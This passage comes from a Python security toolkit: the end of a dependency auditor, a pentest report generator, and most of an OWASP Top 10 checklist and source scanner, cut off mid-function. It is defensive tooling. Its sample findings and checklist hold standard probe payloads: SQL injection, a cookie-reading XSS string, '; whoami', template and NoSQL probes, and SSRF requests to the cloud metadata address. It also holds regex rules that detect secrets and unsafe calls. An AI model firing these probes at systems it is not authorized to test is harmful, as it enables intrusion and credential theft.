requirements.txt (pip/PyPI)
go.mod (Go)
Gemfile (Ruby)
Examples:
%(prog)s --file package.json
%(prog)s --file requirements.txt --severity high
%(prog)s --file go.mod --json
""",
)
parser.add_argument("--file", required=True, metavar="PATH",
help="Path to package manifest file")
parser.add_argument("--severity", choices=["low", "medium", "high", "critical"], default="low",
help="Minimum severity to report (default: low)")
parser.add_argument("--json", action="store_true", dest="json_output",
help="Output results as JSON")
args = parser.parse_args()
if not Path(args.file).exists():
print(f"Error: File not found: {args.file}", file=sys.stderr)
sys.exit(1)
auditor = DependencyAuditor(manifest_path=args.file, severity_filter=args.severity)
result = auditor.audit()
if args.json_output:
json_result = {
"manifest": result["manifest"],
"ecosystem": result["ecosystem"],
"total_dependencies": result["total_dependencies"],
"dev_dependencies": result["dev_dependencies"],
"summary": result["summary"],
"vulnerability_findings": [asdict(f) for f in result["vulnerability_findings"]],
"risky_patterns": [asdict(r) for r in result["risky_patterns"]],
"generated_at": datetime.now().isoformat(),
}
print(json.dumps(json_result, indent=2))
else:
print(format_report_text(result))
# Exit non-zero if critical or high vulnerabilities found
if result["summary"]["critical"] > 0 or result["summary"]["high"] > 0:
sys.exit(1)
if __name__ == "__main__":
main()
FILE:scripts/pentest_report_generator.py
#!/usr/bin/env python3
"""
Pen Test Report Generator - Generate structured penetration testing reports from findings.
Table of Contents:
PentestReportGenerator - Main class for report generation
__init__ - Initialize with findings data
generate_markdown() - Generate markdown report
generate_json() - Generate structured JSON report
_executive_summary() - Build executive summary section
_findings_table() - Build severity-sorted findings table
_detailed_findings() - Build detailed findings with evidence
_remediation_matrix() - Build effort vs. impact remediation matrix
_calculate_risk_score() - Calculate overall risk score
main() - CLI entry point
Usage:
python pentest_report_generator.py --findings findings.json --format md --output report.md
python pentest_report_generator.py --findings findings.json --format json
python pentest_report_generator.py --findings findings.json --format md
"""
import argparse
import json
import sys
from dataclasses import dataclass, asdict, field
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional
@dataclass
class Finding:
"""A single pen test finding."""
title: str
severity: str # critical, high, medium, low, info
cvss_score: float
category: str
description: str
evidence: str
impact: str
remediation: str
cvss_vector: str = ""
references: List[str] = field(default_factory=list)
effort: str = "medium" # low, medium, high — remediation effort
SEVERITY_ORDER = {"critical": 5, "high": 4, "medium": 3, "low": 2, "info": 1}
class PentestReportGenerator:
"""Generate professional penetration testing reports from structured findings."""
def __init__(self, findings: List[Finding], metadata: Optional[Dict] = None):
self.findings = sorted(findings, key=lambda f: SEVERITY_ORDER.get(f.severity, 0), reverse=True)
self.metadata = metadata or {}
self.generated_at = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
def generate_markdown(self) -> str:
"""Generate a complete markdown pen test report."""
sections = []
sections.append(self._header())
sections.append(self._executive_summary())
sections.append(self._scope_section())
sections.append(self._findings_table())
sections.append(self._detailed_findings())
sections.append(self._remediation_matrix())
sections.append(self._methodology_section())
sections.append(self._appendix())
return "\n\n".join(sections)
def generate_json(self) -> Dict:
"""Generate structured JSON report."""
return {
"report_metadata": {
"title": self.metadata.get("title", "Penetration Test Report"),
"target": self.metadata.get("target", "Not specified"),
"tester": self.metadata.get("tester", "Not specified"),
"date_range": self.metadata.get("date_range", "Not specified"),
"generated_at": self.generated_at,
"overall_risk_score": self._calculate_risk_score(),
"overall_risk_level": self._risk_level(),
},
"summary": {
"total_findings": len(self.findings),
"critical": len([f for f in self.findings if f.severity == "critical"]),
"high": len([f for f in self.findings if f.severity == "high"]),
"medium": len([f for f in self.findings if f.severity == "medium"]),
"low": len([f for f in self.findings if f.severity == "low"]),
"info": len([f for f in self.findings if f.severity == "info"]),
},
"findings": [asdict(f) for f in self.findings],
"remediation_priority": self._remediation_priority_list(),
}
def _header(self) -> str:
title = self.metadata.get("title", "Penetration Test Report")
target = self.metadata.get("target", "Not specified")
tester = self.metadata.get("tester", "Not specified")
date_range = self.metadata.get("date_range", "Not specified")
lines = [
f"# {title}",
"",
"| Field | Value |",
"|-------|-------|",
f"| **Target** | {target} |",
f"| **Tester** | {tester} |",
f"| **Date Range** | {date_range} |",
f"| **Report Generated** | {self.generated_at} |",
f"| **Overall Risk** | {self._risk_level()} (Score: {self._calculate_risk_score():.1f}/10) |",
f"| **Total Findings** | {len(self.findings)} |",
]
return "\n".join(lines)
def _executive_summary(self) -> str:
critical = len([f for f in self.findings if f.severity == "critical"])
high = len([f for f in self.findings if f.severity == "high"])
medium = len([f for f in self.findings if f.severity == "medium"])
low = len([f for f in self.findings if f.severity == "low"])
info = len([f for f in self.findings if f.severity == "info"])
risk_score = self._calculate_risk_score()
risk_level = self._risk_level()
lines = [
"## Executive Summary",
"",
f"This penetration test identified **{len(self.findings)} findings** across the target application. "
f"The overall risk level is **{risk_level}** with a score of **{risk_score:.1f}/10**.",
"",
"### Finding Severity Distribution",
"",
"| Severity | Count |",
"|----------|-------|",
f"| Critical | {critical} |",
f"| High | {high} |",
f"| Medium | {medium} |",
f"| Low | {low} |",
f"| Informational | {info} |",
]
# Top 3 findings
if self.findings:
lines.append("")
lines.append("### Top Priority Findings")
lines.append("")
for i, f in enumerate(self.findings[:3], 1):
lines.append(f"{i}. **{f.title}** ({f.severity.upper()}, CVSS {f.cvss_score}) — {f.impact[:120]}")
# Risk assessment
lines.append("")
if critical > 0:
lines.append("> **CRITICAL RISK**: Immediate remediation required. Critical vulnerabilities "
"allow attackers to compromise the system with minimal effort.")
elif high > 0:
lines.append("> **HIGH RISK**: Prompt remediation recommended. High-severity vulnerabilities "
"pose significant risk of exploitation.")
elif medium > 0:
lines.append("> **MODERATE RISK**: Remediation should be planned within the next sprint. "
"Medium findings may be chained for greater impact.")
else:
lines.append("> **LOW RISK**: The application has a reasonable security posture. "
"Address low-severity findings during regular maintenance.")
return "\n".join(lines)
def _scope_section(self) -> str:
scope = self.metadata.get("scope", "Full application security assessment")
exclusions = self.metadata.get("exclusions", "None specified")
test_type = self.metadata.get("test_type", "Gray box")
lines = [
"## Scope",
"",
f"- **In Scope**: {scope}",
f"- **Exclusions**: {exclusions}",
f"- **Test Type**: {test_type}",
]
return "\n".join(lines)
def _findings_table(self) -> str:
lines = [
"## Findings Overview",
"",
"| # | Severity | CVSS | Title | Category |",
"|---|----------|------|-------|----------|",
]
for i, f in enumerate(self.findings, 1):
sev_badge = f.severity.upper()
lines.append(f"| {i} | {sev_badge} | {f.cvss_score} | {f.title} | {f.category} |")
return "\n".join(lines)
def _detailed_findings(self) -> str:
lines = ["## Detailed Findings"]
for i, f in enumerate(self.findings, 1):
lines.append("")
lines.append(f"### {i}. {f.title}")
lines.append("")
lines.append(f"**Severity:** {f.severity.upper()} | **CVSS:** {f.cvss_score}"
+ (f" | **Vector:** `{f.cvss_vector}`" if f.cvss_vector else ""))
lines.append(f"**Category:** {f.category}")
lines.append("")
lines.append("#### Description")
lines.append("")
lines.append(f"{f.description}")
lines.append("")
lines.append("#### Evidence")
lines.append("")
lines.append("```")
lines.append(f"{f.evidence}")
lines.append("```")
lines.append("")
lines.append("#### Impact")
lines.append("")
lines.append(f"{f.impact}")
lines.append("")
lines.append("#### Remediation")
lines.append("")
lines.append(f"{f.remediation}")
if f.references:
lines.append("")
lines.append("#### References")
lines.append("")
for ref in f.references:
lines.append(f"- {ref}")
return "\n".join(lines)
def _remediation_matrix(self) -> str:
lines = [
"## Remediation Priority Matrix",
"",
"Prioritize remediation based on severity and effort:",
"",
"| # | Finding | Severity | Effort | Priority |",
"|---|---------|----------|--------|----------|",
]
for i, f in enumerate(self.findings, 1):
priority = self._compute_priority(f)
lines.append(f"| {i} | {f.title} | {f.severity.upper()} | {f.effort} | {priority} |")
lines.append("")
lines.append("**Priority Key:** P1 = Fix immediately, P2 = Fix this sprint, "
"P3 = Fix this quarter, P4 = Backlog")
return "\n".join(lines)
def _methodology_section(self) -> str:
lines = [
"## Methodology",
"",
"Testing followed the OWASP Testing Guide v4.2 and PTES (Penetration Testing Execution Standard):",
"",
"1. **Reconnaissance** — Mapped attack surface, identified endpoints and technologies",
"2. **Vulnerability Discovery** — Automated scanning + manual testing for OWASP Top 10",
"3. **Exploitation** — Validated findings with proof-of-concept (non-destructive)",
"4. **Post-Exploitation** — Assessed lateral movement and data access potential",
"5. **Reporting** — Documented findings with evidence and remediation guidance",
]
return "\n".join(lines)
def _appendix(self) -> str:
lines = [
"## Appendix",
"",
"### CVSS Scoring Reference",
"",
"| Score Range | Severity |",
"|-------------|----------|",
"| 9.0 - 10.0 | Critical |",
"| 7.0 - 8.9 | High |",
"| 4.0 - 6.9 | Medium |",
"| 0.1 - 3.9 | Low |",
"| 0.0 | Informational |",
"",
"### Disclaimer",
"",
"This report represents a point-in-time assessment. New vulnerabilities may emerge after "
"the testing period. Regular security assessments are recommended.",
"",
f"---\n\n*Report generated on {self.generated_at}*",
]
return "\n".join(lines)
def _calculate_risk_score(self) -> float:
"""Calculate overall risk score (0-10) based on findings."""
if not self.findings:
return 0.0
# Weighted by severity
weights = {"critical": 10, "high": 7, "medium": 4, "low": 1.5, "info": 0.5}
total_weight = sum(weights.get(f.severity, 0) for f in self.findings)
# Normalize: cap at 10, scale based on number of findings
score = min(10.0, total_weight / max(len(self.findings) * 0.5, 1))
return round(score, 1)
def _risk_level(self) -> str:
"""Return risk level string based on score."""
score = self._calculate_risk_score()
if score >= 9.0:
return "CRITICAL"
elif score >= 7.0:
return "HIGH"
elif score >= 4.0:
return "MEDIUM"
elif score > 0:
return "LOW"
return "NONE"
def _compute_priority(self, finding: Finding) -> str:
"""Compute remediation priority from severity and effort."""
sev = SEVERITY_ORDER.get(finding.severity, 0)
effort_map = {"low": 3, "medium": 2, "high": 1}
effort_val = effort_map.get(finding.effort, 2)
score = sev * effort_val
if score >= 12:
return "P1"
elif score >= 8:
return "P2"
elif score >= 4:
return "P3"
return "P4"
def _remediation_priority_list(self) -> List[Dict]:
"""Return ordered list of remediation priorities for JSON output."""
result = []
for f in self.findings:
result.append({
"title": f.title,
"severity": f.severity,
"effort": f.effort,
"priority": self._compute_priority(f),
"remediation": f.remediation,
})
return result
def load_findings(path: str) -> tuple:
"""Load findings from a JSON file."""
try:
content = Path(path).read_text(encoding="utf-8")
data = json.loads(content)
except (OSError, json.JSONDecodeError) as e:
print(f"Error loading findings: {e}", file=sys.stderr)
sys.exit(1)
# Support both list-of-findings and object-with-metadata formats
metadata = {}
findings_data = data
if isinstance(data, dict):
metadata = data.get("metadata", {})
findings_data = data.get("findings", [])
findings = []
for item in findings_data:
findings.append(Finding(
title=item.get("title", "Untitled Finding"),
severity=item.get("severity", "medium"),
cvss_score=float(item.get("cvss_score", 0.0)),
category=item.get("category", "Uncategorized"),
description=item.get("description", ""),
evidence=item.get("evidence", "No evidence provided"),
impact=item.get("impact", ""),
remediation=item.get("remediation", ""),
cvss_vector=item.get("cvss_vector", ""),
references=item.get("references", []),
effort=item.get("effort", "medium"),
))
return findings, metadata
def generate_sample_findings() -> str:
"""Generate a sample findings JSON for reference."""
sample = [
{
"title": "SQL Injection in Login Endpoint",
"severity": "critical",
"cvss_score": 9.8,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"category": "A03:2021 - Injection",
"description": "The /api/login endpoint is vulnerable to SQL injection via the email parameter.",
"evidence": "Request: POST /api/login {\"email\": \"' OR 1=1--\", \"password\": \"x\"}\nResponse: 200 OK with admin session token",
"impact": "Full database access, authentication bypass, potential remote code execution.",
"remediation": "Use parameterized queries. Replace string concatenation with prepared statements.",
"references": ["https://cwe.mitre.org/data/definitions/89.html"],
"effort": "low"
},
{
"title": "Stored XSS in User Profile",
"severity": "high",
"cvss_score": 7.1,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"category": "A03:2021 - Injection",
"description": "The user profile 'bio' field does not sanitize HTML input.",
"evidence": "Submitted <img src=x onerror=alert(document.cookie)> in bio field.\nVisiting the profile page executes the payload.",
"impact": "Session hijacking, account takeover, phishing via stored malicious content.",
"remediation": "Sanitize all user input with DOMPurify. Implement Content-Security-Policy.",
"references": ["https://cwe.mitre.org/data/definitions/79.html"],
"effort": "low"
}
]
return json.dumps(sample, indent=2)
def main():
parser = argparse.ArgumentParser(
description="Pen Test Report Generator — Generate professional penetration testing reports from structured findings.",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s --findings findings.json --format md --output report.md
%(prog)s --findings findings.json --format json
%(prog)s --sample > sample_findings.json
Findings JSON format:
A JSON array of objects with: title, severity, cvss_score, category,
description, evidence, impact, remediation, cvss_vector, references, effort.
Use --sample to generate a template.
""",
)
parser.add_argument("--findings", metavar="FILE",
help="Path to findings JSON file")
parser.add_argument("--format", choices=["md", "json"], default="md",
help="Output format (default: md)")
parser.add_argument("--output", metavar="FILE",
help="Output file path (default: stdout)")
parser.add_argument("--json", action="store_true", dest="json_shortcut",
help="Shortcut for --format json")
parser.add_argument("--sample", action="store_true",
help="Print sample findings JSON and exit")
args = parser.parse_args()
if args.sample:
print(generate_sample_findings())
return
if not args.findings:
parser.error("--findings is required (use --sample to generate a template)")
if not Path(args.findings).exists():
print(f"Error: File not found: {args.findings}", file=sys.stderr)
sys.exit(1)
output_format = "json" if args.json_shortcut else args.format
findings, metadata = load_findings(args.findings)
if not findings:
print("No findings loaded. Check the JSON file format.", file=sys.stderr)
sys.exit(1)
generator = PentestReportGenerator(findings=findings, metadata=metadata)
if output_format == "json":
result = json.dumps(generator.generate_json(), indent=2)
else:
result = generator.generate_markdown()
if args.output:
Path(args.output).write_text(result, encoding="utf-8")
print(f"Report written to {args.output}")
else:
print(result)
if __name__ == "__main__":
main()
FILE:scripts/vulnerability_scanner.py
#!/usr/bin/env python3
"""
Vulnerability Scanner - Generate OWASP Top 10 security checklists and scan for common patterns.
Table of Contents:
VulnerabilityScanner - Main class for vulnerability scanning
__init__ - Initialize with target type and scope
generate_checklist - Generate OWASP Top 10 checklist for target
scan_source - Scan source directory for vulnerability patterns
_scan_file - Scan individual file for regex patterns
_get_owasp_checks - Return OWASP checks for target type
main() - CLI entry point
Usage:
python vulnerability_scanner.py --target web --scope full
python vulnerability_scanner.py --target api --scope quick --json
python vulnerability_scanner.py --target web --source /path/to/code --scope full
"""
import argparse
import json
import os
import re
import sys
from dataclasses import dataclass, asdict, field
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional
@dataclass
class CheckItem:
"""A single check item in the OWASP checklist."""
owasp_id: str
owasp_category: str
check_id: str
title: str
description: str
test_procedure: str
severity: str # critical, high, medium, low, info
applicable_targets: List[str] = field(default_factory=list)
status: str = "pending" # pending, pass, fail, na
@dataclass
class SourceFinding:
"""A vulnerability pattern found in source code."""
rule_id: str
title: str
severity: str
owasp_category: str
file_path: str
line_number: int
code_snippet: str
recommendation: str
class VulnerabilityScanner:
"""Generate OWASP Top 10 checklists and scan source code for vulnerability patterns."""
SCAN_EXTENSIONS = {
".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go",
".rb", ".php", ".cs", ".rs", ".html", ".vue", ".svelte",
}
SKIP_DIRS = {
"node_modules", ".git", "__pycache__", ".venv", "venv",
"vendor", "dist", "build", ".next", "target",
}
def __init__(self, target: str = "web", scope: str = "full", source: Optional[str] = None):
self.target = target
self.scope = scope
self.source = source
def generate_checklist(self) -> List[CheckItem]:
"""Generate OWASP Top 10 checklist for the given target and scope."""
all_checks = self._get_owasp_checks()
filtered = []
for check in all_checks:
if self.target not in check.applicable_targets and "all" not in check.applicable_targets:
continue
if self.scope == "quick" and check.severity in ("low", "info"):
continue
filtered.append(check)
return filtered
def scan_source(self, path: str) -> List[SourceFinding]:
"""Scan source directory for common vulnerability patterns."""
findings = []
source_path = Path(path)
if not source_path.exists():
return findings
for root, dirs, files in os.walk(source_path):
dirs[:] = [d for d in dirs if d not in self.SKIP_DIRS]
for fname in files:
fpath = Path(root) / fname
if fpath.suffix in self.SCAN_EXTENSIONS:
findings.extend(self._scan_file(fpath))
return findings
def _scan_file(self, file_path: Path) -> List[SourceFinding]:
"""Scan a single file for vulnerability patterns."""
findings = []
try:
content = file_path.read_text(encoding="utf-8", errors="ignore")
except (OSError, PermissionError):
return findings
patterns = [
{
"rule_id": "SQLI-001",
"title": "Potential SQL Injection (string concatenation)",
"severity": "critical",
"owasp_category": "A03:2021 - Injection",
"pattern": r'''(?:execute|query|cursor\.execute)\s*\(\s*(?:f["\']|["\'].*%s|["\'].*\+\s*\w+|["\'].*\.format)''',
"recommendation": "Use parameterized queries or prepared statements instead of string concatenation.",
"extensions": {".py", ".js", ".ts", ".java", ".rb", ".php"},
},
{
"rule_id": "SQLI-002",
"title": "Potential SQL Injection (template literal)",
"severity": "critical",
"owasp_category": "A03:2021 - Injection",
"pattern": r'''(?:query|execute|raw)\s*\(\s*`[^`]*\$\{''',
"recommendation": "Use parameterized queries. Never interpolate user input into SQL strings.",
"extensions": {".js", ".ts", ".jsx", ".tsx"},
},
{
"rule_id": "XSS-001",
"title": "Potential DOM-based XSS (innerHTML)",
"severity": "high",
"owasp_category": "A03:2021 - Injection",
"pattern": r'''\.innerHTML\s*=\s*(?!['"][^'"]*['"])''',
"recommendation": "Use textContent or a sanitization library (DOMPurify) instead of innerHTML.",
"extensions": {".js", ".ts", ".jsx", ".tsx", ".html", ".vue", ".svelte"},
},
{
"rule_id": "XSS-002",
"title": "React dangerouslySetInnerHTML usage",
"severity": "high",
"owasp_category": "A03:2021 - Injection",
"pattern": r'''dangerouslySetInnerHTML''',
"recommendation": "Sanitize HTML with DOMPurify before using dangerouslySetInnerHTML.",
"extensions": {".jsx", ".tsx", ".js", ".ts"},
},
{
"rule_id": "CMDI-001",
"title": "Potential Command Injection (shell=True)",
"severity": "critical",
"owasp_category": "A03:2021 - Injection",
"pattern": r'''subprocess\.\w+\(.*shell\s*=\s*True''',
"recommendation": "Avoid shell=True. Use subprocess with a list of arguments instead.",
"extensions": {".py"},
},
{
"rule_id": "CMDI-002",
"title": "Potential Command Injection (eval/exec)",
"severity": "critical",
"owasp_category": "A03:2021 - Injection",
"pattern": r'''(?:^|\s)(?:eval|exec)\s*\((?!.*(?:#\s*nosec|NOSONAR))''',
"recommendation": "Never use eval() or exec() with untrusted input. Use ast.literal_eval() for data parsing.",
"extensions": {".py", ".js", ".ts"},
},
{
"rule_id": "SEC-001",
"title": "Hardcoded Secret or API Key",
"severity": "critical",
"owasp_category": "A02:2021 - Cryptographic Failures",
"pattern": r'''(?i)(?:api[_-]?key|secret[_-]?key|password|passwd|token)\s*[:=]\s*['\"][a-zA-Z0-9+/=]{16,}['\"]''',
"recommendation": "Move secrets to environment variables or a secrets manager (Vault, AWS Secrets Manager).",
"extensions": {".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go", ".rb", ".php"},
},
{
"rule_id": "SEC-002",
"title": "AWS Access Key ID detected",
"severity": "critical",
"owasp_category": "A02:2021 - Cryptographic Failures",
"pattern": r'''AKIA[0-9A-Z]{16}''',
"recommendation": "Remove the AWS key immediately. Rotate the credential and use IAM roles or environment variables.",
"extensions": None, # scan all files
},
{
"rule_id": "CRYPTO-001",
"title": "Weak hashing algorithm (MD5/SHA1)",
"severity": "high",
"owasp_category": "A02:2021 - Cryptographic Failures",
"pattern": r'''(?:md5|sha1)\s*\(''',
"recommendation": "Use bcrypt, scrypt, or argon2 for passwords. Use SHA-256+ for integrity checks.",
"extensions": {".py", ".js", ".ts", ".java", ".go", ".rb", ".php"},
},
{
"rule_id": "SSRF-001",
"title": "Potential SSRF (user-controlled URL in HTTP request)",
"severity": "high",
"owasp_category": "A10:2021 - SSRF",
"pattern": r'''(?:requests\.get|fetch|axios|http\.get|urllib\.request\.urlopen)\s*\(\s*(?:request\.|req\.|params|args|input|user)''',
"recommendation": "Validate and allowlist URLs before making outbound requests. Block internal IPs.",
"extensions": {".py", ".js", ".ts", ".jsx", ".tsx", ".java", ".go"},
},
{
"rule_id": "PATH-001",
"title": "Potential Path Traversal",
"severity": "high",
"owasp_category": "A01:2021 - Broken Access Control",
"pattern": r'''(?:open|readFile|readFileSync|Path\.join)\s*\(.*(?:request\.|req\.|params|args|input|user)''',
"recommendation": "Sanitize file paths. Use os.path.basename() and validate against an allowlist.",
"extensions": {".py", ".js", ".ts", ".java", ".go"},
},
{
"rule_id": "DESER-001",
"title": "Unsafe Deserialization (pickle/yaml.load)",
"severity": "critical",
"owasp_category": "A08:2021 - Software and Data Integrity Failures",
"pattern": r'''(?:pickle\.load|yaml\.load\s*\([^)]*\)\s*(?!.*Loader\s*=\s*yaml\.SafeLoader))''',
"recommendation": "Use yaml.safe_load() instead of yaml.load(). Avoid pickle for untrusted data.",
"extensions": {".py"},
},
{
"rule_id": "AUTH-001",
"title": "JWT with hardcoded secret",
"severity": "critical",
"owasp_category": "A07:2021 - Identification and Authentication Failures",
"pattern": r'''jwt\.(?:encode|sign)\s*\([^)]*['\"][a-zA-Z0-9]{8,}['\"]''',
"recommendation": "Load JWT secrets from environment variables. Use RS256 with key pairs for production.",
"extensions": {".py", ".js", ".ts"},
},
]
lines = content.split("\n")
for i, line in enumerate(lines, 1):
for pat in patterns:
exts = pat.get("extensions")
if exts and file_path.suffix not in exts:
continue
if re.search(pat["pattern"], line):
findings.append(SourceFinding(
rule_id=pat["rule_id"],
title=pat["title"],
severity=pat["severity"],
owasp_category=pat["owasp_category"],
file_path=str(file_path),
line_number=i,
code_snippet=line.strip()[:200],
recommendation=pat["recommendation"],
))
return findings
def _get_owasp_checks(self) -> List[CheckItem]:
"""Return comprehensive OWASP Top 10 checklist items."""
checks = [
# A01: Broken Access Control
CheckItem("A01", "Broken Access Control", "A01-01",
"Horizontal Privilege Escalation",
"Verify users cannot access other users' resources by changing IDs.",
"Change resource IDs in API requests (e.g., /users/123 → /users/124). Expect 403.",
"critical", ["web", "api", "all"]),
CheckItem("A01", "Broken Access Control", "A01-02",
"Vertical Privilege Escalation",
"Verify regular users cannot access admin endpoints.",
"Authenticate as regular user, request admin endpoints. Expect 403.",
"critical", ["web", "api", "all"]),
CheckItem("A01", "Broken Access Control", "A01-03",
"CORS Misconfiguration",
"Verify CORS policy does not allow arbitrary origins.",
"Send request with Origin: https://evil.com. Check Access-Control-Allow-Origin.",
"high", ["web", "api"]),
CheckItem("A01", "Broken Access Control", "A01-04",
"Forced Browsing",
"Check for unprotected admin or debug pages.",
"Request /admin, /debug, /api/admin, /.env, /swagger. Expect 403 or 404.",
"high", ["web", "all"]),
CheckItem("A01", "Broken Access Control", "A01-05",
"Directory Listing",
"Verify directory listing is disabled on the web server.",
"Request directory paths without index file. Should not list contents.",
"medium", ["web"]),
# A02: Cryptographic Failures
CheckItem("A02", "Cryptographic Failures", "A02-01",
"TLS Version Check",
"Ensure TLS 1.2+ is enforced. Reject TLS 1.0/1.1.",
"Run: nmap --script ssl-enum-ciphers -p 443 target.com",
"high", ["web", "api", "all"]),
CheckItem("A02", "Cryptographic Failures", "A02-02",
"Password Hashing Algorithm",
"Verify passwords use bcrypt/scrypt/argon2 with adequate cost.",
"Review authentication code for hashing implementation.",
"critical", ["web", "api", "all"]),
CheckItem("A02", "Cryptographic Failures", "A02-03",
"Sensitive Data in URLs",
"Check for tokens, passwords, or PII in query parameters.",
"Review access logs and URL patterns for sensitive query params.",
"high", ["web", "api"]),
CheckItem("A02", "Cryptographic Failures", "A02-04",
"HSTS Header",
"Verify Strict-Transport-Security header is present.",
"Check response headers for HSTS with max-age >= 31536000.",
"medium", ["web"]),
# A03: Injection
CheckItem("A03", "Injection", "A03-01",
"SQL Injection",
"Test input fields for SQL injection vulnerabilities.",
"Submit ' OR 1=1-- in input fields. Check for errors or unexpected behavior.",
"critical", ["web", "api", "all"]),
CheckItem("A03", "Injection", "A03-02",
"XSS (Cross-Site Scripting)",
"Test for reflected, stored, and DOM-based XSS.",
"Submit <script>alert(1)</script> in input fields. Check if rendered.",
"high", ["web", "all"]),
CheckItem("A03", "Injection", "A03-03",
"Command Injection",
"Test for OS command injection in input fields.",
"Submit ; whoami in fields that may trigger system commands.",
"critical", ["web", "api"]),
CheckItem("A03", "Injection", "A03-04",
"Template Injection",
"Test for server-side template injection.",
"Submit {{7*7}} and 7*7 in input fields. Check for 49 in response.",
"high", ["web", "api"]),
CheckItem("A03", "Injection", "A03-05",
"NoSQL Injection",
"Test for NoSQL injection in JSON inputs.",
"Submit {\"$gt\": \"\"} in JSON fields. Check for data leakage.",
"high", ["api"]),
# A04: Insecure Design
CheckItem("A04", "Insecure Design", "A04-01",
"Rate Limiting on Authentication",
"Verify rate limiting exists on login and password reset endpoints.",
"Send 50+ rapid login requests. Expect 429 after threshold.",
"high", ["web", "api", "all"]),
CheckItem("A04", "Insecure Design", "A04-02",
"Business Logic Abuse",
"Test for business logic flaws (negative quantities, state manipulation).",
"Try negative values, skip steps in workflows, manipulate client-side calculations.",
"high", ["web", "api"]),
CheckItem("A04", "Insecure Design", "A04-03",
"Account Lockout",
"Verify account lockout after repeated failed login attempts.",
"Submit 10+ failed login attempts. Check for lockout or CAPTCHA.",
"medium", ["web", "api"]),
# A05: Security Misconfiguration
CheckItem("A05", "Security Misconfiguration", "A05-01",
"Default Credentials",
"Check for default credentials on admin panels and services.",
"Try admin:admin, root:root, admin:password on all login forms.",
"critical", ["web", "api", "all"]),
CheckItem("A05", "Security Misconfiguration", "A05-02",
"Debug Mode in Production",
"Verify debug mode is disabled in production.",
"Trigger errors and check for stack traces, debug info, or verbose errors.",
"high", ["web", "api", "all"]),
CheckItem("A05", "Security Misconfiguration", "A05-03",
"Security Headers",
"Verify all security headers are present and properly configured.",
"Check for CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy.",
"medium", ["web"]),
CheckItem("A05", "Security Misconfiguration", "A05-04",
"Unnecessary HTTP Methods",
"Verify only required HTTP methods are enabled.",
"Send OPTIONS request. Check for TRACE, DELETE on public endpoints.",
"low", ["web", "api"]),
# A06: Vulnerable Components
CheckItem("A06", "Vulnerable and Outdated Components", "A06-01",
"Dependency CVE Audit",
"Scan all dependencies for known CVEs.",
"Run npm audit, pip audit, govulncheck, or bundle audit.",
"high", ["web", "api", "mobile", "all"]),
CheckItem("A06", "Vulnerable and Outdated Components", "A06-02",
"End-of-Life Framework Check",
"Verify no EOL frameworks or languages are in use.",
"Check framework versions against vendor EOL dates.",
"medium", ["web", "api", "all"]),
# A07: Authentication Failures
CheckItem("A07", "Identification and Authentication Failures", "A07-01",
"Brute Force Protection",
"Verify brute force protection on authentication endpoints.",
"Send 100 rapid login attempts. Expect blocking after threshold.",
"high", ["web", "api", "all"]),
CheckItem("A07", "Identification and Authentication Failures", "A07-02",
"Session Management",
"Verify sessions are properly managed (HttpOnly, Secure, SameSite).",
"Check cookie flags: HttpOnly, Secure, SameSite=Strict|Lax.",
"high", ["web"]),
CheckItem("A07", "Identification and Authentication Failures", "A07-03",
"Session Invalidation on Logout",
"Verify sessions are invalidated on logout.",
"Logout, then replay the session cookie. Should receive 401.",
"high", ["web", "api"]),
CheckItem("A07", "Identification and Authentication Failures", "A07-04",
"Username Enumeration",
"Check for username enumeration via error messages.",
"Submit valid and invalid usernames. Error messages should be identical.",
"medium", ["web", "api"]),
# A08: Data Integrity
CheckItem("A08", "Software and Data Integrity Failures", "A08-01",
"Unsafe Deserialization",
"Check for unsafe deserialization of user input.",
"Review code for pickle.load(), yaml.load(), Java ObjectInputStream.",
"critical", ["web", "api"]),
CheckItem("A08", "Software and Data Integrity Failures", "A08-02",
"Subresource Integrity",
"Verify SRI hashes on CDN-loaded scripts and stylesheets.",
"Check <script> and <link> tags for integrity attributes.",
"medium", ["web"]),
# A09: Logging Failures
CheckItem("A09", "Security Logging and Monitoring Failures", "A09-01",
"Authentication Event Logging",
"Verify login success and failure events are logged.",
"Attempt valid and invalid logins. Check server logs for entries.",
"medium", ["web", "api", "all"]),
CheckItem("A09", "Security Logging and Monitoring Failures", "A09-02",
"Sensitive Data in Logs",
"Verify passwords, tokens, and PII are not logged.",
"Review log configuration and sample log output for sensitive data.",
"high", ["web", "api", "all"]),
# A10: SSRF
CheckItem("A10", "Server-Side Request Forgery", "A10-01",
"Internal Network Access via SSRF",
"Test URL input fields for SSRF vulnerabilities.",
"Submit http://169.254.169.254/ and http://127.0.0.1 in URL fields.",
"critical", ["web", "api"]),
CheckItem("A10", "Server-Side Request Forgery", "A10-02",
"DNS Rebinding",
"Test for DNS rebinding attacks on URL validators.",
"Use a DNS rebinding service to bypass allowlist validation.",
"high", ["web", "api"]),
]
return checks
def format_checklist_text(checks: List[CheckItem]) -> str:
"""Format checklist as human-readable text."""
lines = []
lines.append("=" * 70)
lines.append("OWASP TOP 10 SECURITY CHECKLIST")
lines.append(f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
lines.append(f"Total checks: {len(checks)}")
lines.append("=" * 70)
current_category = ""
for check in checks:
if check.owasp_category != current_category:
current_category = check.owasp_category
lines.append(f"\n--- {check.owasp_id}: {check.owasp_category} ---\n")
sev_marker = {"critical": "[!!!]", "high": "[!! ]", "medium": "[! ]", "low": "[. ]", "info": "[ ]"}
marker = sev_marker.get(check.severity, "[ ]")
lines.append(f" {marker} [{check.check_id}] {check.title}")
lines.append(f" {check.description}")
lines.append(f" Test: {check.test_procedure}")
lines.append(f" Severity: {check.severity.upper()}")
lines.append("")
return "\n".join(lines)
def format_findings_text(findings: List[SourceFinding]) -> str:
"""Format source findings as human-readable text."""
if not findings:
return "No vulnerability patterns detected in source code."
lines = []
lines.append(f"\nSOURCE CODE FINDINGS: {len(findings)} issue(s) found\n")
by_severity = {"critical": [], "high": [], "medium": [], "low": [], "info": []}
for f in findings:
